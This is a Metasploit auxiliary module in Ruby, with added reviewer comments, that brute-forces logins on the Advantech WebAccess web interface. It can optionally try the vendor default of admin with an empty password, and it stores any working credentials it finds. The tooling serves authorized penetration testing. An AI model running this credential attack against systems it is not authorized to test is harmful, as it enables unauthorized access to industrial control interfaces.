rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/http/advantech_webaccess_login.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasploit/framework/login_scanner/advantech_webaccess'
require 'metasploit/framework/credential_collection'
# Auxiliary login scanner for the Advantech WebAccess web interface.
#
# For each target host the module builds a credential collection from the
# datastore, hands it to the AdvantechWebAccess login scanner, and records
# every outcome it recognises through the framework's credential reporting
# helpers (create_credential / create_credential_login / invalidate_login).
#
# Reviewer notes:
# - The option text describes "admin" with an empty password as the product's
#   default credential. A successful login with that pair means the default
#   was never changed on the target.
# - NOTE(review): Reliability, Stability and SideEffects are all declared
#   UNKNOWN. Each tried credential presumably produces at least one HTTP login
#   request, so attempts may appear in the target's logs and may interact with
#   any lockout policy. Confirm and declare this (e.g. IOC_IN_LOGS,
#   ACCOUNT_LOCKOUTS) so operators and defenders know what to expect.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Registers module metadata and the two module-specific options.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Advantech WebAccess Login',
        'Description' => %q{
          This module will attempt to authenticate to Advantech WebAccess.
        },
        'Author' => [ 'sinn3r' ],
        'License' => MSF_LICENSE,
        'DefaultOptions' => {
          'RPORT' => 80
        },
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # TARGETURI is required and defaults to "/"; TRYDEFAULT is opt-in (false).
    module_options = [
      OptString.new('TARGETURI', [true, 'The base path to Advantech WebAccess', '/']),
      OptBool.new('TRYDEFAULT', [false, 'Try the default credential admin:[empty]', false])
    ]
    register_options(module_options)
  end

  # Returns the login scanner for this module instance, building it on first use.
  #
  # The scanner is cached in @scanner, so +ip+ is only consulted by the first
  # call on a given module instance.
  # NOTE(review): this relies on each host being handled by its own module
  # instance - confirm against the Scanner mixin.
  #
  # @param ip [String] address of the host to authenticate against
  # @return [Metasploit::Framework::LoginScanner::AdvantechWebAccess]
  def scanner(ip)
    @scanner ||= begin
      creds = build_credential_collection(
        username: datastore['USERNAME'],
        password: datastore['PASSWORD']
      )

      # Optionally queue the vendor default (admin with an empty password).
      if datastore['TRYDEFAULT']
        print_status("Default credential admin:[empty] added to the credential queue for testing.")
        creds.add_public('admin')
        creds.add_private('')
      end

      # connection_timeout is fixed at 5 (units not shown here; presumably seconds).
      scanner_opts = configure_http_login_scanner(
        host: ip,
        port: datastore['RPORT'],
        cred_details: creds,
        stop_on_success: datastore['STOP_ON_SUCCESS'],
        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
        connection_timeout: 5,
        http_username: datastore['HttpUsername'],
        http_password: datastore['HttpPassword'],
        uri: target_uri.path
      )

      Metasploit::Framework::LoginScanner::AdvantechWebAccess.new(scanner_opts)
    end
  end

  # Records a working credential and the login it produced in the current workspace.
  #
  # The password is handed to create_credential with private_type :password,
  # so the workspace data ends up holding a live credential for the target.
  #
  # @param ip [String] target address
  # @param port [Integer] target TCP port
  # @param result [Object] scan result exposing #credential, #status and #proof
  def report_good_cred(ip, port, result)
    service_data = {
      address: ip,
      port: port,
      service_name: 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    found = result.credential
    credential_data = {
      module_fullname: fullname,
      origin_type: :service,
      private_data: found.private,
      private_type: :password,
      username: found.public,
      **service_data
    }

    core = create_credential(credential_data)

    # last_attempted_at is the time of reporting, not of the HTTP request itself.
    create_credential_login(
      {
        core: core,
        last_attempted_at: DateTime.now,
        status: result.status,
        proof: result.proof,
        **service_data
      }
    )
  end

  # Marks a credential as not valid for this service via invalidate_login.
  #
  # @param ip [String] target address
  # @param rport [Integer] target TCP port
  # @param result [Object] scan result exposing #credential, #status and #proof
  def report_bad_cred(ip, rport, result)
    tried = result.credential

    invalidate_login(
      address: ip,
      port: rport,
      protocol: 'tcp',
      public: tried.public,
      private: tried.private,
      realm_key: tried.realm_key,
      realm_value: tried.realm,
      status: result.status,
      proof: result.proof
    )
  end

  # Runs the login scan against +ip+ and prints/reports each result.
  #
  # Only SUCCESSFUL, UNABLE_TO_CONNECT and INCORRECT are handled; any other
  # status falls through the case and is neither printed nor reported.
  # rport is not defined in this file; presumably it comes from an included mixin.
  #
  # @param ip [String] target address
  def bruteforce(ip)
    login_status = Metasploit::Model::Login::Status

    scanner(ip).scan! do |result|
      case result.status
      when login_status::SUCCESSFUL
        print_brute(level: :good, ip: ip, msg: "Success: '#{result.credential}'")
        report_good_cred(ip, rport, result)
      when login_status::UNABLE_TO_CONNECT
        # A connection failure is still passed to report_bad_cred, with the
        # scanner's proof text as the (verbose-only) message.
        vprint_brute(level: :verror, ip: ip, msg: result.proof)
        report_bad_cred(ip, rport, result)
      when login_status::INCORRECT
        vprint_brute(level: :verror, ip: ip, msg: "Failed: '#{result.credential}'")
        report_bad_cred(ip, rport, result)
      end
    end
  end

  # Per-host entry point: verifies the target is Advantech WebAccess before
  # any credential is tried, and stops with an error message if it is not.
  #
  # @param ip [String] target address
  def run_host(ip)
    if scanner(ip).check_setup
      bruteforce(ip)
    else
      print_brute(level: :error, ip: ip, msg: 'Target is not Advantech WebAccess')
      nil
    end
  end
end